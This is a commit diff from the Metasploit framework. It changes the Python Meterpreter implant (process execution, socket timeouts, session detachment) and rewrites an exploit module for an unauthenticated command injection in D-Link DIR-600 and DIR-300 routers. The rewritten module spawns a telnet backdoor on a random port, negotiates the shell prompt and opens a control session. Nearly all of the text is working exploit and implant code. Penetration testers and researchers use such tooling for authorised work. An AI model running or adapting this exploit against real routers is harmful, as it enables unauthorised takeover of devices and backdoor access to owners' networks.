Merge branch 'upstream-master'

Author: Tod Beardsley

data/meterpreter/ext_server_stdapi.py

@@ -303,6 +303,7 @@ def channel_create_stdapi_fs_file(request, response):
 	fmode = packet_get_tlv(request, TLV_TYPE_FILE_MODE)
 	if fmode:
 		fmode = fmode['value']
+		fmode = fmode.replace('bb', 'b')
 	else:
 		fmode = 'rb'
 	file_h = open(fpath, fmode)
@@ -320,6 +321,7 @@ def channel_create_stdapi_net_tcp_client(request, response):
 	connected = False
 	for i in range(retries + 1):
 		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+		sock.settimeout(3.0)
 		if local_host.get('value') and local_port.get('value'):
 			sock.bind((local_host['value'], local_port['value']))
 		try:
@@ -380,7 +382,7 @@ def stdapi_sys_process_execute(request, response):
 	if len(cmd) == 0:
 		return ERROR_FAILURE, response
 	if os.path.isfile('/bin/sh'):
-		args = ['/bin/sh', '-c', cmd, raw_args]
+		args = ['/bin/sh', '-c', cmd + ' ' + raw_args]
 	else:
 		args = [cmd]
 		args.extend(shlex.split(raw_args))

data/meterpreter/meterpreter.py

@@ -404,5 +404,7 @@ def create_response(self, request):
 		return resp
 
 if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
+	if hasattr(os, 'setsid'):
+		os.setsid()
 	met = PythonMeterpreter(s)
 	met.run()

modules/exploits/linux/http/dlink_command_php_exec_noauth.rb

@@ -11,7 +11,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
 	include Msf::Exploit::Remote::HttpClient
-	include Msf::Auxiliary::CommandShell
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -20,10 +19,7 @@ def initialize(info = {})
 				Different D-Link Routers are vulnerable to OS command injection via the web
 				interface. The vulnerability exists in command.php, which is accessible without
 				authentication. This module has been tested with the versions DIR-600 2.14b01,
-				DIR-300 rev B 2.13. Two target are included, the first one starts a telnetd service
-				and establish a session over it, the second one runs commands via the CMD target.
-				There is no wget or tftp client to upload an elf backdoor easily. According to the
-				vulnerability discoverer, more D-Link devices may affected.
+				DIR-300 rev B 2.13.
 			},
 			'Author'      =>
 				[
@@ -42,61 +38,45 @@ def initialize(info = {})
 				],
 			'DisclosureDate' => 'Feb 04 2013',
 			'Privileged'     => true,
-			'Platform'       => ['linux','unix'],
-			'Payload'        =>
+			'Platform'       => 'unix',
+			'Arch'        => ARCH_CMD,
+			'Payload'     =>
 				{
-					'DisableNops' => true,
+					'Compat'  => {
+						'PayloadType'    => 'cmd_interact',
+						'ConnectionType' => 'find',
+					},
 				},
+			'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
 			'Targets'        =>
 				[
-					[ 'CMD',	#all devices
-						{
-						'Arch' => ARCH_CMD,
-						'Platform' => 'unix'
-						}
-					],
-					[ 'Telnet',	#all devices - default target
-						{
-						'Arch' => ARCH_CMD,
-						'Platform' => 'unix'
-						}
-					],
+					[ 'Automatic',	{ } ]
 				],
-			'DefaultTarget'  => 1
+			'DefaultTarget'  => 0
 			))
-	end
 
-	def exploit
-		if target.name =~ /CMD/
-			exploit_cmd
-		else
-			exploit_telnet
-		end
+		register_advanced_options(
+			[
+				OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
+				OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]),
+				OptInt.new('SessionTimeout', [ true, 'The number of seconds to wait before building the session on the telnet connection', 10])
+			], self.class)
+
 	end
 
-	def exploit_cmd
-		if not (datastore['CMD'])
-			fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
-		end
-		cmd = "#{payload.encoded}; echo end"
-		print_status("#{rhost}:#{rport} - Sending exploit request...")
-		res = request(cmd)
-		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux, HTTP\/1.1, DIR/)
-			fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
-		end
+	def tel_timeout
+		(datastore['TelnetTimeout'] || 10).to_i
+	end
 
-		if res.body.include?("end")
-			print_good("#{rhost}:#{rport} - Exploited successfully\n")
-			vprint_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n")
-			vprint_line("#{rhost}:#{rport} - Output: #{res.body}")
-		else
-			fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
-		end
+	def banner_timeout
+		(datastore['TelnetBannerTimeout'] || 25).to_i
+	end
 
-		return
+	def session_timeout
+		(datastore['SessionTimeout'] || 10).to_i
 	end
 
-	def exploit_telnet
+	def exploit
 		telnetport = rand(65535)
 
 		print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")
@@ -107,39 +87,33 @@ def exploit_telnet
 		print_status("#{rhost}:#{rport} - Sending exploit request...")
 		request(cmd)
 
-		begin
-			sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+		print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
+		sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
 
-			if sock
-				print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...")
-				add_socket(sock)
-			else
-				fail_with(Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
-			end
+		if sock.nil?
+			fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
+		end
 
-			print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}"
-			auth_info = {
-				:host   => rhost,
-				:port   => telnetport,
-				:sname => 'telnet',
-				:user   => "",
-				:pass	=> "",
-				:source_type => "exploit",
-				:active => true
-			}
-			report_auth_info(auth_info)
-			merge_me = {
-				'USERPASS_FILE' => nil,
-				'USER_FILE'     => nil,
-				'PASS_FILE'     => nil,
-				'USERNAME'      => nil,
-				'PASSWORD'      => nil
-			}
-			start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
-		rescue
-			fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not handle the backdoor service")
+		print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
+		prompt = negotiate_telnet(sock)
+		if prompt.nil?
+			sock.close
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
+		else
+			print_good("#{rhost}:#{rport} - Telnet session successfully established... trying to connect")
+		end
+
+		print_status("#{rhost}:#{rport} - Trying to create the Msf session...")
+		begin
+			Timeout.timeout(session_timeout) do
+				activated = handler(sock)
+				while(activated !~ /claimed/)
+					activated = handler(sock)
+				end
+			end
+		rescue ::Timeout::Error
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a Msf session")
 		end
-		return
 	end
 
 	def request(cmd)
@@ -156,7 +130,24 @@ def request(cmd)
 			})
 		return res
 		rescue ::Rex::ConnectionError
-			fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
+			fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")
 		end
 	end
+
+	def negotiate_telnet(sock)
+		begin
+			Timeout.timeout(banner_timeout) do
+				while(true)
+					data = sock.get_once(-1, tel_timeout)
+					return nil if not data or data.length == 0
+					if data =~ /\x23\x20$/
+						return true
+					end
+				end
+			end
+		rescue ::Timeout::Error
+			return nil
+		end
+	end
+
 end